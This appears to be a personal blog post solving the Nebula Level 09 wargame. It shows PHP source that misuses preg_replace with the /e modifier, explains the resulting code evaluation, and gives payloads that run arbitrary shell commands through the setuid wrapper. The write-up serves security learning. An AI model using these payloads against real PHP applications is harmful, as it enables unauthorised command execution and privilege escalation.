<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-us">
<head>
  <link href="http://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

  <title>Exploit Exercises - Nebula Level 09 &middot; jc han</title>

  
  <link rel="stylesheet" href="/css/poole.css">
  <link rel="stylesheet" href="/css/hyde.css">
  <link rel="stylesheet" href="/css/poole-overrides.css">
  <link rel="stylesheet" href="/css/hyde-overrides.css">
  <link rel="stylesheet" href="/css/hyde-x.css">
  
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Sans:400,400italic,700|Abril+Fatface">
  <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/apple-touch-icon-144-precomposed.png">
  <link href="/favicon.png" rel="icon">

  
  
  
  

  <meta name="description" content="">
  <meta name="keywords" content="">
  
</head>
<body>
  <div class="sidebar">
  <div class="container sidebar-sticky">
    <div class="sidebar-about">
      
      <h1>jc han</h1>
      
    </div>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item"><a href="/">Blog</a></li>
      
      <li class="sidebar-nav-item"><a href="/post/">Archives</a></li>
      
      <li class="sidebar-nav-item"><a href="/notes/">Notes</a></li>
      
    </ul>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item">
      <a href="http://github.com/zealoct"><i class="fa fa-github-square fa-3x"></i></a>
      
      
      
      
      <a href="http://twitter.com/zealoct"><i class="fa fa-twitter-square fa-3x"></i></a>
      </li>
    </ul>

    <p>Copyright &copy; 2016 <a href="/license">License</a><br/>
       Powered by <a href="http://gohugo.io">Hugo</a> and <a href="https://github.com/zyro/hyde-x">Hyde-X</a></p>
  </div>
</div>


<div class="content container">
  <div class="post">
    <h1>Exploit Exercises - Nebula Level 09</h1>
    <span class="post-date">Jan 24, 2014 &middot; 2 minute read &middot; <a href="/post/2014-01-24-nebula-level09/#disqus_thread">Comments</a>
    
    <br/>
    
    <a class="label" href="/categories/security">Security</a><a class="label" href="/categories/exercises">Exercises</a><a class="label" href="/categories/nebula">Nebula</a>
    </span>
    

<h3 id="about:e4424096463f5985d9de53dfe658d56b">About</h3>

<p>There&rsquo;s a C setuid wrapper for some vulnerable PHP code&hellip;</p>

<p>To do this level, log in as the <em>level09</em> account with the password <em>level09</em>. Files for this level can be found in /home/flag09.</p>

<h3 id="source-code:e4424096463f5985d9de53dfe658d56b">Source code</h3>

<pre><code class="language-php">&lt;?php

function spam($email)
{
  $email = preg_replace(&quot;/\./&quot;, &quot; dot &quot;, $email);
  $email = preg_replace(&quot;/@/&quot;, &quot; AT &quot;, $email);
  
  return $email;
}

function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);

  $contents = preg_replace(&quot;/(\[email (.*)\])/e&quot;, &quot;spam(\&quot;\\2\&quot;)&quot;, $contents);
  $contents = preg_replace(&quot;/\[/&quot;, &quot;&lt;&quot;, $contents);
  $contents = preg_replace(&quot;/\]/&quot;, &quot;&gt;&quot;, $contents);

  return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?&gt;
</code></pre>

<!-- more -->

<h3 id="solution:e4424096463f5985d9de53dfe658d56b">Solution</h3>

<p>This php snippet does the following things:</p>

<ul>
<li>read the content of file $argv[1]</li>
<li>replace all the text paterns liket &ldquo;[email hjc@hanjc.me]&rdquo; with &ldquo;hjc AT hanjc dot me&rdquo;</li>
<li>replace all the &ldquo;[&rdquo; with &ldquo;&lt;&ldquo;, replace &ldquo;]&rdquo; with &ldquo;&gt;&rdquo;</li>
</ul>

<p>At the very first glace, there seems to be no problem about this code (well, turns out to be that anyone who is familiar with php security would recognize immediatly the vulnerability). But what I knew was that if there be something wrong, it must be the php function <code>preg_replace</code>.</p>

<p>Google this function and I found many useful thing. There is a <a href="https://bugs.php.net/bug.php?id=35960">bug report</a> related to this function, and another <a href="http://www.madirish.net/402">article</a> explains in detail about how to exploit this vulnerability.</p>

<p>In general, the vulnerability exists when a &ldquo;\e&rdquo; is set in the PCRE expression provided to the <code>preg_replace</code> function (as in the code above), in this case, php will do normal substitution of backreferences in the replacement string, evaluate it as PHP code, and use the result for replacing the search string, as mentioned <a href="http://php.net/manual/en/reference.pcre.pattern.modifiers.php">here</a>. This link also provides an input string tha could exploit this function, which is</p>

<pre><code>&lt;h1&gt;{${eval($_GET[php_code])}}&lt;/h1&gt;
</code></pre>

<p>As my goal is to run system command with this function, I modified this attack string to be</p>

<pre><code>[email {${system('touch /home/flag09/test')}}]
</code></pre>

<p>Save this string in /tmp/txt, and run the following command</p>

<pre><code class="language-bash">$ /home/flag09/flag09 /tmp/txt noused
</code></pre>

<p>Although the program produced some errors, the file /home/flag09/test indeed appeared! So this should be a doable way to execute any command, but it is not convenient. Notice there is an additional argument <code>$use_me</code> to function <code>markup</code> that is never used in the function, the name of this variable indicates its purpose, which is too obvious to ignore. So I modified /tmp/txt to</p>

<pre><code>[email {${system($use_me)}}]
</code></pre>

<p>Now I could run any command with</p>

<pre><code class="language-bash">$ /home/flag09/flag09 /tmp/txt &quot;any command&quot;
</code></pre>

  </div>
  <div id="disqus_thread"></div>
</div>


<script type="text/javascript">
var disqus_shortname = "hanjc";
(function () {
    var s = document.createElement('script'); s.async = true;
    s.type = 'text/javascript';
    s.src = '//' + disqus_shortname + '.disqus.com/count.js';
    (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
}());
</script>



<script type="text/javascript">
    var disqus_shortname = "hanjc";
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>



</body>
</html>